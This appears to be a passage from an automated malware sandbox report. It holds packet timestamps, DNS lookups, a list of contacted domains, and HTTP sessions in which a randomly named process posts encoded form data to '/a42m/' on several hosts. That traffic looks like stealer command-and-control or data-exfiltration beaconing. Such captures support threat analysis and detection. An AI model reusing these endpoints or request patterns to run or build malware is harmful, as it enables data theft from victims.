                          May 23, 2024 15:19:03.012587070 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.012763023 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.012891054 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.013617992 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.013631105 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.013679028 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.015186071 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.015198946 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.015237093 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.016453028 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.016465902 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.016508102 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.017793894 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.018516064 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.018529892 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.018542051 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.018543959 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.018572092 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.019979954 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.019993067 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.020034075 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.021302938 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.021316051 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.021348953 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.022430897 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.022443056 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.022475958 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.023551941 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.023565054 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.023598909 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.025434017 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.025446892 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.025458097 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.025477886 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.025497913 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.025783062 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.071671009 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.071732998 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.105314970 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.105384111 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.105608940 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.106250048 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.106292963 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.106914997 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.107567072 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.107579947 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.107618093 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.108899117 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.109555960 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.109568119 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.109601974 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.109623909 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.110908985 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.110922098 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.110933065 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.110960960 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.112215042 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.112226963 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.112263918 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.113528013 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.113539934 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.113579035 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.114588022 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.114598036 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.114624977 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.115720034 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.115731001 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.115741968 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.115772963 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.115797043 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.116678953 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.116689920 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.116714954 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.117785931 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.117796898 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.117825031 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.118882895 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.118895054 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.118957996 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.120013952 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.120024920 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.120218992 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.120899916 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.120912075 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.120923042 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.120943069 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.125619888 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.125659943 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.125932932 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.126699924 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.126769066 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.128027916 CEST8053680104.194.9.31192.168.2.5
                          May 23, 2024 15:19:03.128073931 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:03.515249968 CEST5368080192.168.2.5104.194.9.31
                          May 23, 2024 15:19:04.539158106 CEST5368180192.168.2.5104.194.9.31
                          May 23, 2024 15:19:04.547542095 CEST8053681104.194.9.31192.168.2.5
                          May 23, 2024 15:19:04.547632933 CEST5368180192.168.2.5104.194.9.31
                          May 23, 2024 15:19:04.549344063 CEST5368180192.168.2.5104.194.9.31
                          May 23, 2024 15:19:04.604986906 CEST8053681104.194.9.31192.168.2.5
                          May 23, 2024 15:19:05.396291971 CEST8053681104.194.9.31192.168.2.5
                          May 23, 2024 15:19:05.401604891 CEST8053681104.194.9.31192.168.2.5
                          May 23, 2024 15:19:05.401684046 CEST5368180192.168.2.5104.194.9.31
                          May 23, 2024 15:19:05.402573109 CEST5368180192.168.2.5104.194.9.31
                          May 23, 2024 15:19:05.456556082 CEST8053681104.194.9.31192.168.2.5
                          May 23, 2024 15:19:20.054358006 CEST5368280192.168.2.5192.74.233.3
                          May 23, 2024 15:19:20.068562984 CEST8053682192.74.233.3192.168.2.5
                          May 23, 2024 15:19:20.069468975 CEST5368280192.168.2.5192.74.233.3
                          May 23, 2024 15:19:20.073625088 CEST5368280192.168.2.5192.74.233.3
                          May 23, 2024 15:19:20.079169035 CEST8053682192.74.233.3192.168.2.5
                          May 23, 2024 15:19:20.659538984 CEST8053682192.74.233.3192.168.2.5
                          May 23, 2024 15:19:20.659629107 CEST5368280192.168.2.5192.74.233.3
                          May 23, 2024 15:19:21.579351902 CEST5368280192.168.2.5192.74.233.3
                          May 23, 2024 15:19:21.584566116 CEST8053682192.74.233.3192.168.2.5
                          May 23, 2024 15:19:22.596287012 CEST5368380192.168.2.5192.74.233.3
                          May 23, 2024 15:19:22.604127884 CEST8053683192.74.233.3192.168.2.5
                          May 23, 2024 15:19:22.604202032 CEST5368380192.168.2.5192.74.233.3
                          May 23, 2024 15:19:22.606189966 CEST5368380192.168.2.5192.74.233.3
                          May 23, 2024 15:19:22.656644106 CEST8053683192.74.233.3192.168.2.5
                          May 23, 2024 15:19:23.197334051 CEST8053683192.74.233.3192.168.2.5
                          May 23, 2024 15:19:23.203329086 CEST5368380192.168.2.5192.74.233.3
                          May 23, 2024 15:19:24.110354900 CEST5368380192.168.2.5192.74.233.3
                          May 23, 2024 15:19:24.159612894 CEST8053683192.74.233.3192.168.2.5
                          May 23, 2024 15:19:25.128158092 CEST5368480192.168.2.5192.74.233.3
                          May 23, 2024 15:19:25.136014938 CEST8053684192.74.233.3192.168.2.5
                          May 23, 2024 15:19:25.136100054 CEST5368480192.168.2.5192.74.233.3
                          May 23, 2024 15:19:25.138051987 CEST5368480192.168.2.5192.74.233.3
                          May 23, 2024 15:19:25.143119097 CEST8053684192.74.233.3192.168.2.5
                          May 23, 2024 15:19:25.191411018 CEST8053684192.74.233.3192.168.2.5
                          May 23, 2024 15:19:25.737330914 CEST8053684192.74.233.3192.168.2.5
                          May 23, 2024 15:19:25.739485979 CEST5368480192.168.2.5192.74.233.3
                          May 23, 2024 15:19:26.640480042 CEST5368480192.168.2.5192.74.233.3
                          May 23, 2024 15:19:26.645755053 CEST8053684192.74.233.3192.168.2.5
                          May 23, 2024 15:19:27.659468889 CEST5368580192.168.2.5192.74.233.3
                          May 23, 2024 15:19:27.664592028 CEST8053685192.74.233.3192.168.2.5
                          May 23, 2024 15:19:27.664781094 CEST5368580192.168.2.5192.74.233.3
                          May 23, 2024 15:19:27.667363882 CEST5368580192.168.2.5192.74.233.3
                          May 23, 2024 15:19:27.716706038 CEST8053685192.74.233.3192.168.2.5
                          May 23, 2024 15:19:28.272025108 CEST8053685192.74.233.3192.168.2.5
                          May 23, 2024 15:19:28.275512934 CEST5368580192.168.2.5192.74.233.3
                          May 23, 2024 15:19:28.277220964 CEST5368580192.168.2.5192.74.233.3
                          May 23, 2024 15:19:28.328672886 CEST8053685192.74.233.3192.168.2.5
                          May 23, 2024 15:19:33.326550961 CEST5368680192.168.2.566.29.137.43
                          May 23, 2024 15:19:33.331496000 CEST805368666.29.137.43192.168.2.5
                          May 23, 2024 15:19:33.333234072 CEST5368680192.168.2.566.29.137.43
                          May 23, 2024 15:19:33.342453957 CEST5368680192.168.2.566.29.137.43
                          May 23, 2024 15:19:33.384738922 CEST805368666.29.137.43192.168.2.5
                          May 23, 2024 15:19:33.932486057 CEST805368666.29.137.43192.168.2.5
                          May 23, 2024 15:19:33.939410925 CEST805368666.29.137.43192.168.2.5
                          May 23, 2024 15:19:33.939429998 CEST805368666.29.137.43192.168.2.5
                          May 23, 2024 15:19:33.939452887 CEST5368680192.168.2.566.29.137.43
                          May 23, 2024 15:19:33.939491987 CEST5368680192.168.2.566.29.137.43
                          May 23, 2024 15:19:34.843437910 CEST5368680192.168.2.566.29.137.43
                          May 23, 2024 15:19:35.861987114 CEST5368780192.168.2.566.29.137.43
                          May 23, 2024 15:19:35.867150068 CEST805368766.29.137.43192.168.2.5
                          May 23, 2024 15:19:35.867362022 CEST5368780192.168.2.566.29.137.43
                          May 23, 2024 15:19:35.869069099 CEST5368780192.168.2.566.29.137.43
                          May 23, 2024 15:19:35.920634031 CEST805368766.29.137.43192.168.2.5
                          May 23, 2024 15:19:36.461682081 CEST805368766.29.137.43192.168.2.5
                          May 23, 2024 15:19:36.466526985 CEST805368766.29.137.43192.168.2.5
                          May 23, 2024 15:19:36.466546059 CEST805368766.29.137.43192.168.2.5
                          May 23, 2024 15:19:36.466564894 CEST5368780192.168.2.566.29.137.43
                          May 23, 2024 15:19:36.466598988 CEST5368780192.168.2.566.29.137.43
                          May 23, 2024 15:19:37.377571106 CEST5368780192.168.2.566.29.137.43
                          May 23, 2024 15:19:38.393563032 CEST5368880192.168.2.566.29.137.43
                          May 23, 2024 15:19:38.398535013 CEST805368866.29.137.43192.168.2.5
                          May 23, 2024 15:19:38.398602009 CEST5368880192.168.2.566.29.137.43
                          May 23, 2024 15:19:38.400913954 CEST5368880192.168.2.566.29.137.43
                          May 23, 2024 15:19:38.405865908 CEST805368866.29.137.43192.168.2.5
                          May 23, 2024 15:19:38.455312014 CEST805368866.29.137.43192.168.2.5
                          May 23, 2024 15:19:39.005091906 CEST805368866.29.137.43192.168.2.5
                          May 23, 2024 15:19:39.009840012 CEST805368866.29.137.43192.168.2.5
                          May 23, 2024 15:19:39.009849072 CEST805368866.29.137.43192.168.2.5
                          May 23, 2024 15:19:39.009933949 CEST5368880192.168.2.566.29.137.43
                          May 23, 2024 15:19:39.905976057 CEST5368880192.168.2.566.29.137.43
                          May 23, 2024 15:19:40.925594091 CEST5368980192.168.2.566.29.137.43
                          May 23, 2024 15:19:41.193614006 CEST805368966.29.137.43192.168.2.5
                          May 23, 2024 15:19:41.197273970 CEST5368980192.168.2.566.29.137.43
                          May 23, 2024 15:19:41.197451115 CEST5368980192.168.2.566.29.137.43
                          May 23, 2024 15:19:41.203496933 CEST805368966.29.137.43192.168.2.5
                          May 23, 2024 15:19:41.800538063 CEST805368966.29.137.43192.168.2.5
                          May 23, 2024 15:19:41.805368900 CEST805368966.29.137.43192.168.2.5
                          May 23, 2024 15:19:41.805377007 CEST805368966.29.137.43192.168.2.5
                          May 23, 2024 15:19:41.806509018 CEST5368980192.168.2.566.29.137.43
                          May 23, 2024 15:19:41.808101892 CEST5368980192.168.2.566.29.137.43
                          May 23, 2024 15:19:41.857327938 CEST805368966.29.137.43192.168.2.5
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                          May 23, 2024 15:19:33.320512056 CEST1.1.1.1192.168.2.50x75aNo error (0)ratulunabet78.xyz66.29.137.43A (IP address)IN (0x0001)false
                          May 23, 2024 15:19:51.687715054 CEST1.1.1.1192.168.2.50xe844Server failure (2)www.designsbysruly.comnonenoneA (IP address)IN (0x0001)false
                          May 23, 2024 15:19:56.721750975 CEST1.1.1.1192.168.2.50x9a2eName error (3)www.weeveno.comnonenoneA (IP address)IN (0x0001)false
                          May 23, 2024 15:20:05.294856071 CEST1.1.1.1192.168.2.50xce9bName error (3)www.gcashservice247.comnonenoneA (IP address)IN (0x0001)false
                          May 23, 2024 15:20:13.883647919 CEST1.1.1.1192.168.2.50x8c6cName error (3)www.infomail.websitenonenoneA (IP address)IN (0x0001)false
                          • www.gregoriusalvin.com
                          • www.tintasmaiscor.com
                          • www.crimsoncascade.xyz
                          • www.xn--bb55rtp-9va2p.store
                          • www.fidyart.com
                          • www.leaflearn.store
                          • www.p65cq675did.shop
                          • www.digitoxmarketing.com
                          • www.6whebx.cyou
                          • www.ratulunabet78.xyz
                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          0 | 192.168.2.5 | 53652 | 103.247.10.164 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:16:50.015697002 CEST | 488 | OUT | GET /a42m/?R0nl4=f64p&vH5=6CH/YRMAK7aydmoZX4rE3aHTO96gtIC3593I/qH1Euv5gdtO1aVIaIsEnNz/XwGPewRjk6ONG4Ys+seqd2cELhY1N+SfeluTEbHos+Hkwv+a06EBMG8yJcZA+l8yWcOKFg== HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Host: www.gregoriusalvin.com
                          Connection: close
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          May 23, 2024 15:16:51.268683910 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 1238
                          date: Thu, 23 May 2024 13:16:51 GMT
                          server: LiteSpeed
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                          May 23, 2024 15:16:51.274008036 CEST | 240 | IN
                          Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          1 | 192.168.2.5 | 53654 | 162.240.81.18 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:17:10.469532967 CEST | 759 | OUT | POST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.tintasmaiscor.com
                          Origin: http://www.tintasmaiscor.com
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 204
                          Connection: close
                          Referer: http://www.tintasmaiscor.com/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Ascii: vH5=MYp7xREo2lWmqxyrxuy/tz8vnf6tYfxqKfeTC/BPj4vtA6/phvMJoS1D38V/Mh1XbIcoUu2EnQb2nO9eIfKIUI/6BtU49lbxhd6iZkvKrOzqVeiL/34AU/Id3kgwswrwdd17Y8NsSV+MEoveLEZ9Zb6PU3m2pP3TUnmaz2tItve/+rsEgwG8AULYebafDn/66ZWRs18=
                          May 23, 2024 15:17:11.082813025 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.20.1
                          Date: Thu, 23 May 2024 13:17:11 GMT
                          Content-Type: text/html
                          Content-Length: 3650
                          Connection: close
                          ETag: "636d2d22-e42"
                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                          May 23, 2024 15:17:11.086544991 CEST | 1236 | IN
                          Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                          May 23, 2024 15:17:11.090539932 CEST | 1236 | IN
                          Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                          May 23, 2024 15:17:11.090557098 CEST | 115 | IN
                          Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          2 | 192.168.2.5 | 53655 | 162.240.81.18 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:17:13.037537098 CEST | 779 | OUT | POST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.tintasmaiscor.com
                          Origin: http://www.tintasmaiscor.com
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 224
                          Connection: close
                          Referer: http://www.tintasmaiscor.com/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Ascii: vH5=MYp7xREo2lWmrRCrh9a/sT8sr/6tX/xUKfSTC7RhjMDtO/DpguMJrS1DiMV+Tx1cbIQKUuaEnQP2nPNeIMSLb4/8KNU6lFbxhd6iZkLsrOrqVtqLw24BdfIeyUgwowr0dd1jY4MBSX2MEq3eLVZ+Ar6WKHmoqMGISRWg10oSspuNy9Bu6SOUT0ngOISoSXeTg6GhyioA3bBdH0ySHbmN/FJOi1ck
                          May 23, 2024 15:17:13.611696959 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.20.1
                          Date: Thu, 23 May 2024 13:17:13 GMT
                          Content-Type: text/html
                          Content-Length: 3650
                          Connection: close
                          ETag: "636d2d22-e42"
                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                          May 23, 2024 15:17:13.612622976 CEST | 1236 | IN
                          Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                          May 23, 2024 15:17:13.617400885 CEST | 1236 | IN
                          Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                          May 23, 2024 15:17:13.617435932 CEST | 115 | IN
                          Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          3 | 192.168.2.5 | 53656 | 162.240.81.18 | 80 | 7116 | C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Timestamp | Bytes transferred | Direction | Data
                          May 23, 2024 15:17:16.224153996 CEST | 1796 | OUT | POST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.tintasmaiscor.com
                          Origin: http://www.tintasmaiscor.com
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 1240
                          Connection: close
                          Referer: http://www.tintasmaiscor.com/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Ascii: vH5=MYp7xREo2lWmrRCrh9a/sT8sr/6tX/xUKfSTC7RhjMLtOJ3pmMkJqS1DjMVzTx1BbIYOUumUnT32lpZefNSLAo/8FtU79la7hbauZk7srOrqVrOL0n4BffId3kg8swrQdZhzY4B8RmWMEKneNjl+fb6DLHn7qMKtSRjb11c8suCNwbofrHvCRVKBI/KzHmrqhs6W6gQg7LtKARjQMpzOrERNvR9en9dgeWDpt/ft0dmGpnarZbq7dGkTNslingyOMULnBVxlkJkUvEUacQz/B+rVmO2A1lINuKxsiBTW4qgboqC7CO49hkB4wqobxhfsiydPteiNpkfewnKAf4eqehDnPupuTYLbQXR55Dpjtrg5z2mrUNxNo4C0ykZPYVXjGU0Nrbk2Km/8X16KU/rpDZImqjylc4ykVPVHuA7VZdKqOmIwhx5fYejNDnXUOkBQF3Tn2xSqNosz4B5Z0GO2I4XheGX+66j6Jj9OeJzK3Z4QeDASxFxZLOD8T4Vfl0HXKP78CvQPRZAGHRwDy6IC06pSo4mbmebgDhDLRfiAMMBNHP2hj5eg/a5BM3ZL0UqSjwc4KZs4/glH7bf+61i3BP/1SZO6prfV5ganXclLb7rKGmVZjjztcLmETXafRMZvY1Pn4mZmlPqV6kPATLQTBEnYnrGIs7wh/dJibZcwnA+RlTcqzLTxu7oJy4nbCCwj45c00C251bHxuQ9jtZyA+nfu1Iw3EJdMzF0/DraKLCcWKUoSU90jH1wNLdALMGq/DQC0moBEKimLc6Gk044hQULabem0rtEmwRaxOypOmgSFWrGctF6bcSzY2vZCkI03ZhWrC/9KduTJCHDfL1J0WqqbJ3rfCR3aEZQIKv6Ql+NhH69JlU4WzmnUJr1yxGqOQ6i7l4Row4O/V6Jyl/y4FkiAK7qBHYX04sRzmLIaPeaaKpxoMWS9c5a/aVs5WmeEnu+9nt2eX02dflHWhIPOtil8thwXY13YKxJIjVWMxIIPlxkO [TRUNCATED]
                          May 23, 2024 15:17:16.787184954 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.20.1
                          Date: Thu, 23 May 2024 13:17:16 GMT
                          Content-Type: text/html
                          Content-Length: 3650
                          Connection: close
                          ETag: "636d2d22-e42"
                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                          May 23, 2024 15:17:16.789999008 CEST | 224 | IN
                          Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center;
                          May 23, 2024 15:17:16.792588949 CEST | 1236 | IN
                          Data Ascii: background-color: #3C6EB4; font-size: 1.1em; font-weight: bold; color: #fff; margin: 0; padding: 0.5em; border-bottom: 2px solid #294172;
                          May 23, 2024 15:17:16.792620897 CEST | 224 | IN
                          Data Ascii: <div class="content"> <p>Something has triggered missing webpage on your website. This is the default 404 error page for <strong>nginx</strong> that is distr
                          May 23, 2024 15:17:16.845016003 CEST | 903 | IN
                          Data Ascii: ibuted with Fedora. It is located <tt>/usr/share/nginx/html/404.html</tt></p> <p>You should customize this error page for your own site or edit the <tt>error_pag


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
